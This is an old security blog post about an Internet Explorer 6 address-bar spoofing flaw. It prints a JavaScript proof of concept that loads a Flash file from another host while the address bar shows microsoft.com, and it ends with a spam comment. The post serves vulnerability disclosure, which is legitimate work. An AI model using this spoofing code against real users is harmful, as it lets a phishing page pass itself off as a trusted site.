04 April 2006 | 9,789 views

IE Address Bar Spoofing

Check Your Web Security with Acunetix

I recently found on securityfocus mailinglist a bug in IE which can be exploited with a simple javascript code to spoof the address bar location…

This allow attacker inject a malicious shockwave-flash application into Internet Explorer while it is display another URL (even trusted sites).

The vulnerability has been confirmed on a fully patched system with Internet Explorer 6.0 + Microsoft Windows XP SP2 and previous versions.
Sample code:

<script language=”javascript”>
function pause(ms)
{
date = new Date();
var curDate = null;

do { var curDate = new Date(); }
while(curDate-date < ms);
}

function spoof () {
win = window.open(‘http://www.microsoft.com/’,’new’)
pause (2000)
win = window.open(‘http://www.buctuong.com/swfs/index.swf’,’new’)
pause (2000)
win = window.open(‘http://www.microsoft.com/’,’new’)

}
</script>
<a href=”javascript: spoof()”>Perform the test</a>

If you are vulnerable you will see the flash intro of buctuong.com while the address bar is http://www.microsoft.com/ If you have a very fast connection you may change my flash application to a larger one to make loading time take longer.

This spoofing technique discovered and proved by

Hai Nam Luke
K46A – NEU, Hanoi



Recent in Exploits/Vulnerabilities:
- XML Quadratic Blowup Attack Blows Up WordPress & Drupal
- Password Manager Security – LastPass, RoboForm Etc Are Not That Safe
- Hacking Your Fridge – Internet of Things Security

Related Posts:
- Zodiac – DNS Protocol Monitoring and Spoofing Tool
- Caller ID Spoofing to be Made Illegal in the USA
- Caller ID Spoofing is Still Easy- FCC Investigates

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 227,308 views
- AJAX: Is your application secure enough? - 119,084 views
- eEye Launches 0-Day Exploit Tracker - 85,051 views

Low-cost VPS Hosting

One Response to “IE Address Bar Spoofing”

  1. Hungry Hacker 11 July 2008 at 7:09 am Permalink

    Hello darknet,
    This is Hungry Hacker from the site mentioned above. I liked your website and I would like to perform link exchange with your website. If you are interested then reply me.
    Regards,
    Hungry Hacker.